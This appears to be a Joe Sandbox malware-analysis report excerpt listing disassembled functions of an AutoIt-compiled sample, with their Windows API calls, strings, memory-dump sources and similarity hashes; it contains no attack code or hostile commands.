Function 00264ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00264AED
GetDriveTypeW.KERNEL32(?,0028CB68,?,\\.\,0028CC08), ref: 00264BCA
SetErrorMode.KERNEL32(00000000,0028CB68,?,\\.\,0028CC08), ref: 00264D36

Strings

PhysicalDrive, xrefs: 00264B76
Virtual, xrefs: 00264CE5
1394, xrefs: 00264C9F
Fibre, xrefs: 00264CAD
SATA, xrefs: 00264CD0
SSD, xrefs: 00264C4A
Unknown, xrefs: 00264BED, 00264C83
USB, xrefs: 00264CB4
SSA, xrefs: 00264CA6
ATA, xrefs: 00264C98
MMC, xrefs: 00264CDE
SCSI, xrefs: 00264C8A
Removable, xrefs: 00264C10, 00264C15
\\.\, xrefs: 00264B3F
FileBackedVirtual, xrefs: 00264CEC
iSCSI, xrefs: 00264CC2
ATAPI, xrefs: 00264C91
Network, xrefs: 00264C02
RAMDisk, xrefs: 00264BF4
RAID, xrefs: 00264CBB
Fixed, xrefs: 00264C09
CDROM, xrefs: 00264BFB
SAS, xrefs: 00264CC9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: a0bbb289d62e6fe7b737b42ab0c05ed0de7e0480c5e40c5dad02e895d4a4d188
Instruction ID: 3d511bb1a81b9328320b2dc88dcc4f36ab8d4c651af06c836a9926f2ef55a9b2
Opcode Fuzzy Hash: a0bbb289d62e6fe7b737b42ab0c05ed0de7e0480c5e40c5dad02e895d4a4d188
Instruction Fuzzy Hash: 5961D47063110B9BCB04FF28C9859BD7BA0AF05384B244516F886AB391DB75EDB1DB51

Function 002873E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00287421
SetTextColor.GDI32(?,?), ref: 00287425
GetSysColorBrush.USER32(0000000F), ref: 0028743B
GetSysColor.USER32(0000000F), ref: 00287446
CreateSolidBrush.GDI32(?), ref: 0028744B
GetSysColor.USER32(00000011), ref: 00287463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00287471
SelectObject.GDI32(?,00000000), ref: 00287482
SetBkColor.GDI32(?,00000000), ref: 0028748B
SelectObject.GDI32(?,?), ref: 00287498
InflateRect.USER32(?,000000FF,000000FF), ref: 002874B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002874CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002874DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0028752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00287554
InflateRect.USER32(?,000000FD,000000FD), ref: 00287572
DrawFocusRect.USER32(?,?), ref: 0028757D
GetSysColor.USER32(00000011), ref: 0028758E
SetTextColor.GDI32(?,00000000), ref: 00287596
DrawTextW.USER32(?,002870F5,000000FF,?,00000000), ref: 002875A8
SelectObject.GDI32(?,?), ref: 002875BF
DeleteObject.GDI32(?), ref: 002875CA
SelectObject.GDI32(?,?), ref: 002875D0
DeleteObject.GDI32(?), ref: 002875D5
SetTextColor.GDI32(?,?), ref: 002875DB
SetBkColor.GDI32(?,?), ref: 002875E5

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 08794dcaf3095dfd9bb870c138460924a00e237d831cc399bf38da2c36ab0b99
Instruction ID: 2d5869939b742e5fcfaf413f70102026000d5da3991a0467017496d6c0847c13
Opcode Fuzzy Hash: 08794dcaf3095dfd9bb870c138460924a00e237d831cc399bf38da2c36ab0b99
Instruction Fuzzy Hash: BE615F7A901219AFDF019FA4EC49EAE7FB9EB08320F214115F915BB2E1D7749950CFA0

Function 00280FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00281128
GetDesktopWindow.USER32 ref: 0028113D
GetWindowRect.USER32(00000000), ref: 00281144
GetWindowLongW.USER32(?,000000F0), ref: 00281199
DestroyWindow.USER32(?), ref: 002811B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002811ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0028120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0028121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00281232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00281245
IsWindowVisible.USER32(00000000), ref: 002812A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002812BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002812D0
GetWindowRect.USER32(00000000,?), ref: 002812E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0028130E
GetMonitorInfoW.USER32(00000000,?), ref: 00281328
CopyRect.USER32(?,?), ref: 0028133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002813AA

Strings

0, xrefs: 002810D3
tooltips_class32, xrefs: 002811E6
(, xrefs: 0028131B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 137bf9769e519895644db3b16690a3327c77ea0fbb34a9e0c6b6d00d41e6a2ac
Instruction ID: 416b2e1faa73ee93a1d1e665791daf98f96646219352a6a4ae1f3edf88a885f6
Opcode Fuzzy Hash: 137bf9769e519895644db3b16690a3327c77ea0fbb34a9e0c6b6d00d41e6a2ac
Instruction Fuzzy Hash: AFB1B175619351AFD704EF64D888B6ABBE8FF84300F00891CF9999B2E1C771E865CB61

Function 00280241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002802E5
_wcslen.LIBCMT ref: 0028031F
_wcslen.LIBCMT ref: 00280389
_wcslen.LIBCMT ref: 002803F1
_wcslen.LIBCMT ref: 00280475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002804C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00280504

Part of subcall function 0020F9F2: _wcslen.LIBCMT ref: 0020F9FD

Part of subcall function 0025223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00252258
Part of subcall function 0025223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0025228A

Strings

GETSELECTED, xrefs: 002805E1
ISSELECTED, xrefs: 002804DD
DESELECT, xrefs: 0028059C
SELECT, xrefs: 00280548
GETITEMCOUNT, xrefs: 00280316, 00280337
SELECTALL, xrefs: 00280515
VIEWCHANGE, xrefs: 00280675
SELECTINVERT, xrefs: 0028057E
SELECTCLEAR, xrefs: 0028052D
GETTEXT, xrefs: 002803EC, 00280407
FINDITEM, xrefs: 00280627
GETSUBITEMCOUNT, xrefs: 00280384, 0028039F
GETSELECTEDCOUNT, xrefs: 00280470, 0028048B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 4e00bad52193848881fa01933fb68f41698f535dd8ae568c178f9661c2ae8022
Instruction ID: 5a9509200a4c60bae0566a94e5c7812176e0d2deeb68ab6c41e34bf5722a9200
Opcode Fuzzy Hash: 4e00bad52193848881fa01933fb68f41698f535dd8ae568c178f9661c2ae8022
Instruction Fuzzy Hash: E3E1D0352293028FC754EF24C59083AB3E6BFD8354B14496DF8969B2E2DB30ED69CB51

Function 00208891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00208968
GetSystemMetrics.USER32(00000007), ref: 00208970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020899B
GetSystemMetrics.USER32(00000008), ref: 002089A3
GetSystemMetrics.USER32(00000004), ref: 002089C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002089E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002089F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00208A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00208A3C
GetClientRect.USER32(00000000,000000FF), ref: 00208A5A
GetStockObject.GDI32(00000011), ref: 00208A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00208A81

Part of subcall function 0020912D: GetCursorPos.USER32(?), ref: 00209141
Part of subcall function 0020912D: ScreenToClient.USER32(00000000,?), ref: 0020915E
Part of subcall function 0020912D: GetAsyncKeyState.USER32(00000001), ref: 00209183
Part of subcall function 0020912D: GetAsyncKeyState.USER32(00000002), ref: 0020919D

SetTimer.USER32(00000000,00000000,00000028,002090FC), ref: 00208AA8

Strings

AutoIt v3 GUI, xrefs: 00208A20

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c065cbce9e054d93cd90b67853894d032fa5acfc5ac493c88825ec1cbdcd7e37
Instruction ID: e55e8adf281eb9d6fbefff6297e35866ae02dbbbb52caa14f6e09db6e8124bf2
Opcode Fuzzy Hash: c065cbce9e054d93cd90b67853894d032fa5acfc5ac493c88825ec1cbdcd7e37
Instruction Fuzzy Hash: D5B18A75A1020A9FDF14DFA8DC49BAA7BB4FB49314F104229FA05A72D1DB74E860CF51

Function 00250D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00251114
Part of subcall function 002510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 00251120
Part of subcall function 002510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 0025112F
Part of subcall function 002510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 00251136
Part of subcall function 002510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0025114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00250DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00250E29
GetLengthSid.ADVAPI32(?), ref: 00250E40
GetAce.ADVAPI32(?,00000000,?), ref: 00250E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00250E96
GetLengthSid.ADVAPI32(?), ref: 00250EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00250EB5
HeapAlloc.KERNEL32(00000000), ref: 00250EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00250EDD
CopySid.ADVAPI32(00000000), ref: 00250EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00250F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00250F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00250F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00250F6E
HeapFree.KERNEL32(00000000), ref: 00250F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00250F7E
HeapFree.KERNEL32(00000000), ref: 00250F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00250F8E
HeapFree.KERNEL32(00000000), ref: 00250F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00250FA1
HeapFree.KERNEL32(00000000), ref: 00250FA8

Part of subcall function 00251193: GetProcessHeap.KERNEL32(00000008,00250BB1,?,00000000,?,00250BB1,?), ref: 002511A1
Part of subcall function 00251193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00250BB1,?), ref: 002511A8
Part of subcall function 00251193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00250BB1,?), ref: 002511B7

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4e838e93e0bc4be411f7bf9860585da5c3285c1fd65b2326b71cf7798245f236
Instruction ID: 3af422afad2752cfb1b59f8dc9134cab64d199695d2bafc2930ed2e28a3e1274
Opcode Fuzzy Hash: 4e838e93e0bc4be411f7bf9860585da5c3285c1fd65b2326b71cf7798245f236
Instruction Fuzzy Hash: 5A717E7591120AEBDF209FA4EC89FAEBBB8BF04341F144125F919A6191DB319D19CB70

Function 0027C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0027C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0028CC08,00000000,?,00000000,?,?), ref: 0027C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0027C5A4
_wcslen.LIBCMT ref: 0027C5F4
_wcslen.LIBCMT ref: 0027C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0027C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0027C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0027C84D
RegCloseKey.ADVAPI32(?), ref: 0027C881
RegCloseKey.ADVAPI32(00000000), ref: 0027C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0027C960

Strings

REG_SZ, xrefs: 0027C644
REG_QWORD, xrefs: 0027C8C3
REG_EXPAND_SZ, xrefs: 0027C5CD
REG_MULTI_SZ, xrefs: 0027C6F5
REG_BINARY, xrefs: 0027C913
REG_DWORD, xrefs: 0027C804

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: a6ad8e98e31fe98b45465611e256ada6e968b1b980f6ad0ce2ceaa9526511cb5
Instruction ID: 31aa61e77efb35ed95e83947cff68eff0479f0e9ae1b7e70b188c3ff6fcccb22
Opcode Fuzzy Hash: a6ad8e98e31fe98b45465611e256ada6e968b1b980f6ad0ce2ceaa9526511cb5
Instruction Fuzzy Hash: 541278356142019FCB14DF24D891E2AB7E5FF88714F24889CF98A9B3A2DB31ED55CB81

Function 0028091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002809C6
_wcslen.LIBCMT ref: 00280A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00280A54
_wcslen.LIBCMT ref: 00280A8A
_wcslen.LIBCMT ref: 00280B06
_wcslen.LIBCMT ref: 00280B81

Part of subcall function 0020F9F2: _wcslen.LIBCMT ref: 0020F9FD

Part of subcall function 00252BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00252BFA

Strings

GETSELECTED, xrefs: 00280C4E
ISCHECKED, xrefs: 00280CE1
EXISTS, xrefs: 00280B7C, 00280B97
SELECT, xrefs: 00280D11
CHECK, xrefs: 00280A85, 00280AA0
EXPAND, xrefs: 00280BF8
GETITEMCOUNT, xrefs: 00280C1E
GETTOTALCOUNT, xrefs: 002809F2, 00280A17
COLLAPSE, xrefs: 00280B01, 00280B1C
GETTEXT, xrefs: 00280C97
UNCHECK, xrefs: 00280D3E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 68534803c563caecffe94c560bfb0a644d75b264803d8d58d4060ad111ffa653
Instruction ID: ced090ecc7aa51bd1b76333189909b53e7342427751252f376693765e89e45e8
Opcode Fuzzy Hash: 68534803c563caecffe94c560bfb0a644d75b264803d8d58d4060ad111ffa653
Instruction Fuzzy Hash: 76E1B1392293028FC754EF24C49096AB7E1FF98358F14895DF8955B3A2D730ED69CB81

Function 0027C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0027B6AE,?,?), ref: 0027C9B5
_wcslen.LIBCMT ref: 0027C9F1
_wcslen.LIBCMT ref: 0027CA68
_wcslen.LIBCMT ref: 0027CA9E
_wcslen.LIBCMT ref: 0027CAF9
_wcslen.LIBCMT ref: 0027CB2F
_wcslen.LIBCMT ref: 0027CB7F

Strings

HKEY_CURRENT_USER, xrefs: 0027CBBD
HKEY_CLASSES_ROOT, xrefs: 0027CAF3, 0027CAF8
HKLM, xrefs: 0027CA98, 0027CA9D
HKEY_LOCAL_MACHINE, xrefs: 0027CA62, 0027CA67
HKCC, xrefs: 0027CBAC
HKU, xrefs: 0027CBF0
HKEY_USERS, xrefs: 0027CBDF
HKEY_CURRENT_CONFIG, xrefs: 0027CB79, 0027CB7E
HKCR, xrefs: 0027CB29, 0027CB2E
HKCU, xrefs: 0027CBCE

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 2dba11f0badbaab2057833ff833dd5480f82c56504d4a1efffeda72e071bbcd8
Instruction ID: 5b4a33d8fb47773abc55c50c5cc8dcb5592cd5d39ec831c32b349e6a712b5084
Opcode Fuzzy Hash: 2dba11f0badbaab2057833ff833dd5480f82c56504d4a1efffeda72e071bbcd8
Instruction Fuzzy Hash: EB71F53263016B8BCB20DE78C9415FB3395AFB0794B31812DF85D97284EA31CDA487A0

Function 0028833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0028835A
_wcslen.LIBCMT ref: 0028836E
_wcslen.LIBCMT ref: 00288391
_wcslen.LIBCMT ref: 002883B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002883F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00285BF2), ref: 0028844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00288487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002884CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00288501
FreeLibrary.KERNEL32(?), ref: 0028850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028851D
DestroyIcon.USER32(?,?,?,?,?,00285BF2), ref: 0028852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00288549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00288555

Strings

.icl, xrefs: 00288368
.dll, xrefs: 002883AB
.exe, xrefs: 00288388

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 14ca7a5aa9935a8ac42ad6efeee0783be4e0b119aaf262a363da7a30db5d5a90
Instruction ID: 654358a7433bb648b38b67b20285207b09189427bfe5b5eea3c43fd511bd8c7c
Opcode Fuzzy Hash: 14ca7a5aa9935a8ac42ad6efeee0783be4e0b119aaf262a363da7a30db5d5a90
Instruction Fuzzy Hash: 1561147552120ABEEB14EF64DC85BFE77ACBF04711F504109F815E60D1DB74A9A0CBA0

Function 001F7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Cannot parse #include, xrefs: 00235279
", xrefs: 00235153
#notrayicon, xrefs: 001F77E7
#include-once, xrefs: 001F782F
', xrefs: 00235169
#ce, xrefs: 001F78ED
#requireadmin, xrefs: 001F77FF
#include, xrefs: 001F7847
#OnAutoItStartRegister, xrefs: 001F7817
#cs, xrefs: 001F7873, 001F78C5
Unterminated group of comments, xrefs: 0023528C
Bad directive syntax error, xrefs: 0023519A
#pragma compile, xrefs: 001F77D3
#comments-start, xrefs: 001F785F, 001F78B1
#comments-end, xrefs: 001F78D9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 2daaa1361e3af0ca9180357ffa532c0903805a54ed97558eef8265c0fbe7fb77
Instruction ID: 76ffa99a65c3ccd4fbffd560429bce7b1f20be496eacfe52ff72ab4a7d6efa29
Opcode Fuzzy Hash: 2daaa1361e3af0ca9180357ffa532c0903805a54ed97558eef8265c0fbe7fb77
